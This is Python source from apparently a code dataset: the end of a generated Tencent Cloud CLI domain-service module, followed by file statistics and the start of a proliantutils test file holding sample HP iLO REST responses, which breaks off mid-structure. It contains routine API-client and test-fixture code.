cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateTemplateRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.CreateTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyDomainOwnerBatch(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyDomainOwnerBatchRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.ModifyDomainOwnerBatch(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribePhoneEmailList(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribePhoneEmailListRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribePhoneEmailList(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyDomainDNSBatch(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyDomainDNSBatchRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.ModifyDomainDNSBatch(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeDomainPriceList(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeDomainPriceListRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribeDomainPriceList(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateDomainBatch(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateDomainBatchRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.CreateDomainBatch(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
CLIENT_MAP = {
"v20180808": domain_client_v20180808,
}
MODELS_MAP = {
"v20180808": models_v20180808,
}
ACTION_MAP = {
"SetDomainAutoRenew": doSetDomainAutoRenew,
"CheckBatchStatus": doCheckBatchStatus,
"UploadImage": doUploadImage,
"SendPhoneEmailCode": doSendPhoneEmailCode,
"DescribeDomainNameList": doDescribeDomainNameList,
"DeletePhoneEmail": doDeletePhoneEmail,
"DescribeDomainBaseInfo": doDescribeDomainBaseInfo,
"DescribeBatchOperationLogDetails": doDescribeBatchOperationLogDetails,
"DeleteTemplate": doDeleteTemplate,
"CheckDomain": doCheckDomain,
"RenewDomainBatch": doRenewDomainBatch,
"DescribeTemplate": doDescribeTemplate,
"CreatePhoneEmail": doCreatePhoneEmail,
"DescribeTemplateList": doDescribeTemplateList,
"DescribeBatchOperationLogs": doDescribeBatchOperationLogs,
"BatchModifyDomainInfo": doBatchModifyDomainInfo,
"TransferProhibitionBatch": doTransferProhibitionBatch,
"TransferInDomainBatch": doTransferInDomainBatch,
"UpdateProhibitionBatch": doUpdateProhibitionBatch,
"CreateTemplate": doCreateTemplate,
"ModifyDomainOwnerBatch": doModifyDomainOwnerBatch,
"DescribePhoneEmailList": doDescribePhoneEmailList,
"ModifyDomainDNSBatch": doModifyDomainDNSBatch,
"DescribeDomainPriceList": doDescribeDomainPriceList,
"CreateDomainBatch": doCreateDomainBatch,
}
AVAILABLE_VERSION_LIST = [
"v20180808",
]
def action_caller():
return ACTION_MAP
def parse_global_arg(parsed_globals):
g_param = parsed_globals
is_exist_profile = True
if not parsed_globals["profile"]:
is_exist_profile = False
g_param["profile"] = "default"
configure_path = os.path.join(os.path.expanduser("~"), ".tccli")
is_conf_exist, conf_path = Utils.file_existed(configure_path, g_param["profile"] + ".configure")
is_cred_exist, cred_path = Utils.file_existed(configure_path, g_param["profile"] + ".credential")
conf = {}
cred = {}
if is_conf_exist:
conf = Utils.load_json_msg(conf_path)
if is_cred_exist:
cred = Utils.load_json_msg(cred_path)
if not (isinstance(conf, dict) and isinstance(cred, dict)):
raise ConfigurationError(
"file: %s or %s is not json format"
% (g_param["profile"] + ".configure", g_param["profile"] + ".credential"))
if OptionsDefine.Token not in cred:
cred[OptionsDefine.Token] = None
if not is_exist_profile:
if os.environ.get(OptionsDefine.ENV_SECRET_ID) and os.environ.get(OptionsDefine.ENV_SECRET_KEY):
cred[OptionsDefine.SecretId] = os.environ.get(OptionsDefine.ENV_SECRET_ID)
cred[OptionsDefine.SecretKey] = os.environ.get(OptionsDefine.ENV_SECRET_KEY)
cred[OptionsDefine.Token] = os.environ.get(OptionsDefine.ENV_TOKEN)
if os.environ.get(OptionsDefine.ENV_REGION):
conf[OptionsDefine.Region] = os.environ.get(OptionsDefine.ENV_REGION)
if os.environ.get(OptionsDefine.ENV_ROLE_ARN) and os.environ.get(OptionsDefine.ENV_ROLE_SESSION_NAME):
cred[OptionsDefine.RoleArn] = os.environ.get(OptionsDefine.ENV_ROLE_ARN)
cred[OptionsDefine.RoleSessionName] = os.environ.get(OptionsDefine.ENV_ROLE_SESSION_NAME)
for param in g_param.keys():
if g_param[param] is None:
if param in [OptionsDefine.SecretKey, OptionsDefine.SecretId, OptionsDefine.Token]:
if param in cred:
g_param[param] = cred[param]
elif not g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
raise ConfigurationError("%s is invalid" % param)
elif param in [OptionsDefine.Region, OptionsDefine.Output]:
if param in conf:
g_param[param] = conf[param]
else:
raise ConfigurationError("%s is invalid" % param)
elif param.replace('_', '-') in [OptionsDefine.RoleArn, OptionsDefine.RoleSessionName]:
if param.replace('_', '-') in cred:
g_param[param] = cred[param.replace('_', '-')]
try:
if g_param[OptionsDefine.ServiceVersion]:
g_param[OptionsDefine.Version] = "v" + g_param[OptionsDefine.ServiceVersion].replace('-', '')
else:
version = conf["domain"][OptionsDefine.Version]
g_param[OptionsDefine.Version] = "v" + version.replace('-', '')
if g_param[OptionsDefine.Endpoint] is None:
g_param[OptionsDefine.Endpoint] = conf["domain"][OptionsDefine.Endpoint]
except Exception as err:
raise ConfigurationError("config file:%s error, %s" % (conf_path, str(err)))
if g_param[OptionsDefine.Version] not in AVAILABLE_VERSION_LIST:
raise Exception("available versions: %s" % " ".join(AVAILABLE_VERSION_LIST))
if g_param[OptionsDefine.Waiter]:
param = eval(g_param[OptionsDefine.Waiter])
if 'expr' not in param:
raise Exception('`expr` in `--waiter` must be defined')
if 'to' not in param:
raise Exception('`to` in `--waiter` must be defined')
if 'timeout' not in param:
if 'waiter' in conf and 'timeout' in conf['waiter']:
param['timeout'] = conf['waiter']['timeout']
else:
param['timeout'] = 180
if 'interval' not in param:
if 'waiter' in conf and 'interval' in conf['waiter']:
param['interval'] = conf['waiter']['interval']
else:
param['timeout'] = 5
param['interval'] = min(param['interval'], param['timeout'])
g_param['OptionsDefine.WaiterInfo'] = param
# 如果在配置文件中读取字段的值,python2中的json.load函数会读取unicode类型的值,因此这里要转化类型
if six.PY2:
for key, value in g_param.items():
if isinstance(value, six.text_type):
g_param[key] = value.encode('utf-8')
return g_param
| 52.200439
| 155
| 0.679139
| 7,676
| 71,358
| 6.090672
| 0.032178
| 0.096253
| 0.28895
| 0.124679
| 0.891791
| 0.88608
| 0.883385
| 0.879235
| 0.87423
| 0.869952
| 0
| 0.004829
| 0.187477
| 71,358
| 1,366
| 156
| 52.238653
| 0.801518
| 0.004639
| 0
| 0.779365
| 0
| 0
| 0.137652
| 0.071565
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021429
| false
| 0
| 0.012698
| 0.000794
| 0.035714
| 0.019841
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
819f728ce3bc8ec0c52a1b0482a9f9d068c9e2c3
| 146,869
|
py
|
Python
|
proliantutils/tests/ilo/ris_sample_outputs.py
|
anta-nok/proliantutils
|
35c711e391b839bbb93c24880e08e4ac7554dae6
|
[
"Apache-2.0"
] | null | null | null |
proliantutils/tests/ilo/ris_sample_outputs.py
|
anta-nok/proliantutils
|
35c711e391b839bbb93c24880e08e4ac7554dae6
|
[
"Apache-2.0"
] | null | null | null |
proliantutils/tests/ilo/ris_sample_outputs.py
|
anta-nok/proliantutils
|
35c711e391b839bbb93c24880e08e4ac7554dae6
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2015 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# Flake doesn't allow files without anything. Remove on first commit.
MODULE = "RIS"
HTTP_BOOT_URL = {
"UefiShellStartupUrl": "http://10.10.1.30:8081/startup.nsh"
}
RESPONSE_BODY_FOR_REST_OP = """
{
"AssetTag": "",
"AvailableActions": [
{
"Action": "Reset",
"Capabilities": [
{
"AllowableValues": [
"On",
"ForceOff",
"ForceRestart",
"Nmi",
"PushPowerButton"
],
"PropertyName": "ResetType"
}
]
}
],
"Bios": {
"Current": {
"VersionString": "I36 v1.40 (01/28/2015)"
}
},
"Boot": {
"BootSourceOverrideEnabled": "Disabled",
"BootSourceOverrideSupported": [
"None",
"Cd",
"Hdd",
"Usb",
"Utilities",
"Diags",
"BiosSetup",
"Pxe",
"UefiShell",
"UefiTarget"
],
"BootSourceOverrideTarget": "None",
"UefiTargetBootSourceOverride": "None",
"UefiTargetBootSourceOverrideSupported": [
"HD.Emb.1.2",
"Generic.USB.1.1",
"NIC.FlexLOM.1.1.IPv4",
"NIC.FlexLOM.1.1.IPv6",
"CD.Virtual.2.1"
]
},
"Description": "Computer System View",
"HostCorrelation": {
"HostMACAddress": [
"6c:c2:17:39:fe:80",
"6c:c2:17:39:fe:88"
],
"HostName": "",
"IPAddress": [
"",
""
]
},
"IndicatorLED": "Off",
"Manufacturer": "HP",
"Memory": {
"TotalSystemMemoryGB": 16
},
"Model": "ProLiant BL460c Gen9",
"Name": "Computer System",
"Oem": {
"Hp": {
"AvailableActions": [
{
"Action": "PowerButton",
"Capabilities": [
{
"AllowableValues": [
"Press",
"PressAndHold"
],
"PropertyName": "PushType"
},
{
"AllowableValues": [
"/Oem/Hp"
],
"PropertyName": "Target"
}
]
},
{
"Action": "SystemReset",
"Capabilities": [
{
"AllowableValues": [
"ColdBoot"
],
"PropertyName": "ResetType"
},
{
"AllowableValues": [
"/Oem/Hp"
],
"PropertyName": "Target"
}
]
}
],
"Battery": [],
"Bios": {
"Backup": {
"Date": "v1.40 (01/28/2015)",
"Family": "I36",
"VersionString": "I36 v1.40 (01/28/2015)"
},
"Current": {
"Date": "01/28/2015",
"Family": "I36",
"VersionString": "I36 v1.40 (01/28/2015)"
},
"UefiClass": 2
},
"DeviceDiscoveryComplete": {
"AMSDeviceDiscovery": "NoAMS",
"SmartArrayDiscovery": "Initial",
"vAuxDeviceDiscovery": "DataIncomplete",
"vMainDeviceDiscovery": "ServerOff"
},
"PostState": "PowerOff",
"PowerAllocationLimit": 500,
"PowerAutoOn": "PowerOn",
"PowerOnDelay": "Minimum",
"PowerRegulatorMode": "Dynamic",
"PowerRegulatorModesSupported": [
"OSControl",
"Dynamic",
"Max",
"Min"
],
"ServerSignature": 0,
"Type": "HpComputerSystemExt.0.10.1",
"VirtualProfile": "Inactive",
"VirtualUUID": null,
"links": {
"BIOS": {
"href": "/rest/v1/systems/1/bios"
},
"MEMORY": {
"href": "/rest/v1/Systems/1/Memory"
},
"PCIDevices": {
"href": "/rest/v1/Systems/1/PCIDevices"
},
"PCISlots": {
"href": "/rest/v1/Systems/1/PCISlots"
},
"SecureBoot": {
"href": "/rest/v1/Systems/1/SecureBoot"
}
}
}
},
"Power": "Off",
"Processors": {
"Count": 1,
"ProcessorFamily": "Intel(R) Xeon(R) CPU E5-2609 v3 @ 1.90GHz",
"Status": {
"HealthRollUp": "OK"
}
},
"SKU": "727021-B21",
"SerialNumber": "SGH449WNL3",
"Status": {
"Health": "OK",
"State": "Disabled"
},
"SystemType": "Physical",
"Type": "ComputerSystem.0.9.6",
"UUID": "30373237-3132-4753-4834-3439574E4C33",
"links": {
"Chassis": [
{
"href": "/rest/v1/Chassis/1"
}
],
"Logs": {
"href": "/rest/v1/Systems/1/Logs"
},
"ManagedBy": [
{
"href": "/rest/v1/Managers/1"
}
],
"self": {
"href": "/rest/v1/Systems/1"
}
}
}
"""
RESPONSE_BODY_FOR_REST_OP_WITH_ISCSI = """
{
"Boot": {
"BootSourceOverrideEnabled": "Disabled",
"BootSourceOverrideSupported": [
"None",
"Cd",
"Hdd",
"Usb",
"Utilities",
"Diags",
"BiosSetup",
"Pxe",
"UefiShell",
"UefiTarget"
],
"BootSourceOverrideTarget": "None",
"UefiTargetBootSourceOverride": "None",
"UefiTargetBootSourceOverrideSupported": [
"HD.Emb.1.2",
"Generic.USB.1.1",
"NIC.FlexLOM.1.1.IPv4",
"NIC.FlexLOM.1.1.IPv6",
"NIC.LOM.1.1.iSCSI",
"CD.Virtual.2.1"
]
}
}
"""
RESPONSE_BODY_FOR_REST_OP_WITH_ISCSI_AND_NONE = """
{
"Boot": {
"BootSourceOverrideEnabled": "Disabled",
"BootSourceOverrideSupported": [
"None",
"Cd",
"Hdd",
"Usb",
"Utilities",
"Diags",
"BiosSetup",
"Pxe",
"UefiShell",
"UefiTarget"
],
"BootSourceOverrideTarget": "None",
"UefiTargetBootSourceOverride": "None",
"UefiTargetBootSourceOverrideSupported": [
"HD.Emb.1.2",
null,
"HD.Emb.2.1",
"HD.Emb.1.2",
"NIC.FlexLOM.1.1.IPv4",
"NIC.FlexLOM.1.1.IPv6",
"NIC.LOM.1.1.iSCSI",
"CD.Virtual.2.1"
]
}
}
"""
HEADERS_FOR_REST_OP = [('content-length', '2729'),
('server', 'HP-iLO-Server/1.30'),
('etag', 'W/"B61EB245"'),
('allow', 'GET, HEAD, POST, PATCH'),
('cache-control', 'no-cache'),
('date', 'Thu, 19 Mar 2015 06:55:59 GMT'),
('x_hp-chrp-service-version', '1.0.3'),
('content-type', 'application/json')]
COLLECTIONS_SAMPLE = """
{
"Description": "iLO User Accounts",
"links": {
"Member": [
{
"href": "/rest/v1/AccountService/Accounts/1"
}
],
"self": {
"href": "/rest/v1/AccountService/Accounts"
}
},
"Items": [
{
"UserName": "Administrator",
"Description": "iLO User Account",
"links": {
"self": {
"href": "/rest/v1/AccountService/Accounts/1"
}
},
"Oem": {
"Hp": {
"Privileges": {
"RemoteConsolePriv": "true",
"iLOConfigPriv": "true",
"VirtualMediaPriv": "true",
"UserConfigPriv": "true",
"VirtualPowerAndResetPriv": "true",
"LoginPriv": "true"
},
"LoginName": "Administrator",
"Type": "HpiLOAccount.0.9.7"
}
},
"Password": null,
"Type": "ManagerAccount.0.9.7",
"Name": "User Account"
}
],
"MemberType": "ManagerAccount.0",
"Total": 1,
"Type": "Collection.0.9.5",
"Name": "Accounts"
}
"""
GET_HEADERS = {
'content-length': '114',
'etag': 'W/"715B59E6"',
'allow': 'GET, HEAD, PATCH, POST',
'cache-control': 'no-cache',
'date': 'Mon, 23 Mar 2015 08:49:12 GMT',
'server': 'HP-iLO-Server/1.30',
'content-type': 'application/json',
'x_hp-chrp-service-version': '1.0.3'
}
REST_GET_SMART_STORAGE = """
{
"Model": "ProLiant BL460c Gen9",
"Name": "Computer System",
"Oem": {
"Hp": {
"links":
{
"SmartStorage":
{
"href": "/rest/v1/Systems/1/SmartStorage"
}
}
}
}
}
"""
REST_GET_SECURE_BOOT = {
"Name": "SecureBoot",
"ResetAllKeys": True,
"ResetToDefaultKeys": True,
"SecureBootCurrentState": False,
"SecureBootEnable": True,
"Type": "HpSecureBoot.0.9.5",
"links":
{
"self":
{
"href": "/rest/v1/Systems/1/SecureBoot"
}
}
}
REST_FAILURE_OUTPUT = {
'Type': 'ExtendedError.1.0.0',
'Messages': [{'MessageID': 'Base.0.0.FakeFailureMessage'}],
'Name': 'Extended Error Information'
}
REST_POST_RESPONSE = {
'Type': 'ExtendedError.0.9.6',
'Messages': [{'MessageID': 'Base.0.0.Success'}],
'Name': 'Extended Error Information'
}
GET_MANAGER_DETAILS = """
{
"AvailableActions":
[
{
"Action": "Reset"
}
],
"CommandShell":
{
"ConnectTypesSupported":
[
"SSH",
"Oem"
],
"Enabled": true,
"MaxConcurrentSessions": 9
},
"Description": "Manager View",
"Firmware":
{
"Current":
{
"VersionString": "iLO 4 v2.20"
}
},
"GraphicalConsole":
{
"ConnectTypesSupported":
[
"KVMIP"
],
"Enabled": true,
"MaxConcurrentSessions": 10
},
"ManagerType": "BMC",
"Model": "iLO 4",
"Name": "Manager",
"Oem":
{
"Hp":
{
"AvailableActions":
[
{
"Action": "ResetRestApiState",
"Capabilities":
[
{
"AllowableValues":
[
"/Oem/Hp"
],
"PropertyName": "Target"
}
]
}
],
"FederationConfig":
{
"IPv6MulticastScope": "Site",
"MulticastAnnouncementInterval": 600,
"MulticastDiscovery": "Enabled",
"MulticastTimeToLive": 5,
"iLOFederationManagement": "Enabled"
},
"Firmware":
{
"Current":
{
"Date": "Feb 09 2015",
"DebugBuild": false,
"MajorVersion": 2,
"MinorVersion": 4,
"Time": "",
"VersionString": "iLO 4 v2.04"
}
},
"License":
{
"LicenseKey": "32Q6W-PQWTB-H7XYL-39968-RR53R",
"LicenseString": "iLO 4 Advanced",
"LicenseType": "Perpetual"
},
"RequiredLoginForiLORBSU": false,
"SerialCLISpeed": 9600,
"SerialCLIStatus": "EnabledAuthReq",
"Type": "HpiLO.0.13.0",
"VSPLogDownloadEnabled": false,
"iLOSelfTestResults":
[
{
"Notes": "",
"SelfTestName": "NVRAMData",
"Status": "OK"
},
{
"Notes": "Controller firmware revision 2.09.00 ",
"SelfTestName": "EmbeddedFlash/SDCard",
"Status": "OK"
},
{
"Notes": "",
"SelfTestName": "EEPROM",
"Status": "OK"
},
{
"Notes": "",
"SelfTestName": "HostRom",
"Status": "OK"
},
{
"Notes": "",
"SelfTestName": "SupportedHost",
"Status": "OK"
},
{
